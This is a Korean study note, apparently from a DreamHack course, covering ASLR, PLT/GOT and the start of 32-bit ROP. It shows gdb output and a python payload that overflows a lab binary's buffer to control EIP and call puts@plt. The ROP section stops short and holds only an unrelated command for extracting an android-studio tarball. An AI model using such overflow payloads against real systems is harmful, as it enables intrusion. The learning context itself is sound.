5 DreamHack Linux Exploitation & Mitigation Part 2

1. ASLR

Address Space Layout Randomization(ASLR)은 라이브러리, 힙, 스택 영역 등의 주소를 바이너리가 실행될 때마다 랜덤하게 바꿔 RTL과 같이 정해진 주소를 이용한 공격을 막기 위한 보호 기법

NX bit는 바이너리의 컴파일 옵션에 따라 적용 여부가 결정되었던 것과 달리, ASLR은 서버의 설정 파일에 의해 보호 기법의 적용이 결정됩니다.

  1. 0 : ASLR을 적용하지 않음
  2. 1 : 스택, 힙 메모리를 랜덤화
  3. 2 : 스택, 힙, 라이브러리 메모리를 랜덤화
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

(gdb) disas main
Dump of assembler code for function main:
   0x5655556d <+0>:	push   ebp
   0x5655556e <+1>:	mov    ebp,esp
   0x56555570 <+3>:	push   ebx
   0x56555571 <+4>:	sub    esp,0x20
   0x56555574 <+7>:	call   0x56555470 <__x86.get_pc_thunk.bx>
   0x56555579 <+12>:	add    ebx,0x1a5b
   0x5655557f <+18>:	mov    ecx,0x0
   0x56555584 <+23>:	mov    eax,0x20
   0x56555589 <+28>:	and    eax,0xfffffffc
   0x5655558c <+31>:	mov    edx,eax
   0x5655558e <+33>:	mov    eax,0x0
   0x56555593 <+38>:	mov    DWORD PTR [ebp+eax*1-0x24],ecx
   0x56555597 <+42>:	add    eax,0x4
   0x5655559a <+45>:	cmp    eax,edx
   0x5655559c <+47>:	jb     0x56555593 <main+38>
   0x5655559e <+49>:	lea    eax,[ebx-0x1974]
   0x565555a4 <+55>:	push   eax
   0x565555a5 <+56>:	call   0x565553f0 <puts@plt>
   0x565555aa <+61>:	add    esp,0x4
   0x565555ad <+64>:	lea    eax,[ebx-0x1967]
   0x565555b3 <+70>:	push   eax
   0x565555b4 <+71>:	call   0x565553f0 <puts@plt>
   0x565555b9 <+76>:	add    esp,0x4
   0x565555bc <+79>:	lea    eax,[ebp-0x24]
   0x565555bf <+82>:	push   eax
   0x565555c0 <+83>:	lea    eax,[ebx-0x195b]
---Type <return> to continue, or q <return> to quit---
   0x565555c6 <+89>:	push   eax
   0x565555c7 <+90>:	call   0x56555410 <__isoc99_scanf@plt>
   0x565555cc <+95>:	add    esp,0x8
   0x565555cf <+98>:	mov    eax,0x0
   0x565555d4 <+103>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x565555d7 <+106>:	leave  
   0x565555d8 <+107>:	ret    
End of assembler dump.
(gdb) r
Starting program: /home/ubuntu/asm/example4 
Hello World!
Hello ASLR!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0xf7dfae00 in __libc_start_main () from /lib32/libc.so.6
(gdb) p/x $eip
$1 = 0xf7dfae00
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/ubuntu/asm/example4 
Hello World!
Hello ASLR!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) p/x $eip
$2 = 0x42424242
(gdb)

저번 실습과같이 추가적인 4바이트 삽입이 있어야한다.

2. PLT, GOT Section

PLT는 고정 주소

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

(gdb) disas main
Dump of assembler code for function main:
   0x08048476 <+0>:	push   %ebp
   0x08048477 <+1>:	mov    %esp,%ebp
   0x08048479 <+3>:	push   %ebx
   0x0804847a <+4>:	sub    $0x20,%esp
   0x0804847d <+7>:	call   0x80483b0 <__x86.get_pc_thunk.bx>
   0x08048482 <+12>:	add    $0x1b7e,%ebx
   0x08048488 <+18>:	mov    $0x0,%ecx
   0x0804848d <+23>:	mov    $0x20,%eax
   0x08048492 <+28>:	and    $0xfffffffc,%eax
   0x08048495 <+31>:	mov    %eax,%edx
   0x08048497 <+33>:	mov    $0x0,%eax
   0x0804849c <+38>:	mov    %ecx,-0x24(%ebp,%eax,1)
   0x080484a0 <+42>:	add    $0x4,%eax
   0x080484a3 <+45>:	cmp    %edx,%eax
   0x080484a5 <+47>:	jb     0x804849c <main+38>
   0x080484a7 <+49>:	lea    -0x1a90(%ebx),%eax
   0x080484ad <+55>:	push   %eax
   0x080484ae <+56>:	call   0x8048320 <puts@plt>
   0x080484b3 <+61>:	add    $0x4,%esp
   0x080484b6 <+64>:	lea    -0x1a83(%ebx),%eax
   0x080484bc <+70>:	push   %eax
   0x080484bd <+71>:	call   0x8048320 <puts@plt>
   0x080484c2 <+76>:	add    $0x4,%esp
   0x080484c5 <+79>:	lea    -0x24(%ebp),%eax
   0x080484c8 <+82>:	push   %eax
   0x080484c9 <+83>:	lea    -0x1a77(%ebx),%eax
   0x080484cf <+89>:	push   %eax
   0x080484d0 <+90>:	call   0x8048340 <__isoc99_scanf@plt>
   0x080484d5 <+95>:	add    $0x8,%esp
   0x080484d8 <+98>:	mov    $0x0,%eax
   0x080484dd <+103>:	mov    -0x4(%ebp),%ebx
   0x080484e0 <+106>:	leave  
   0x080484e1 <+107>:	ret    
End of assembler dump.
(gdb) disas 0x8048320
Dump of assembler code for function puts@plt:
   0x08048320 <+0>:	jmp    *0x804a00c
   0x08048326 <+6>:	push   $0x0
   0x0804832b <+11>:	jmp    0x8048310
(gdb) x/wx 0x804a00c
0x804a00c:	0x08048326
  • put@plt : 0x08048320
  • GOT : 0x08048326
1
2
3
4
5
6
7
8
9
10

(gdb) b *0x080484bd
Breakpoint 1 at 0x80484bd
(gdb) r
Starting program: /home/ubuntu/dreamhack/example4 
Hello World!

Breakpoint 1, 0x080484bd in main ()
(gdb) x/s $eax
0x804857d:	"Hello ASLR!"


1
2
3
4

ubuntu@ubuntu-virtual-machine:~/dreamhack$ (python -c 'print "A"*40 + "\x26\x83\x04\x08" + "BBBB" + "\x7f\x85\x04\x08"') | ./example4
Hello World!
Hello ASLR!
llo ASLR!

3. 32bit Return Oriented Programming

android-studio-ide-193.6514223-linux.tar.gz sudo tar -xvf android-studio-ide-193.6514223-linux.tar.gz

Posted 2020-08-31
notes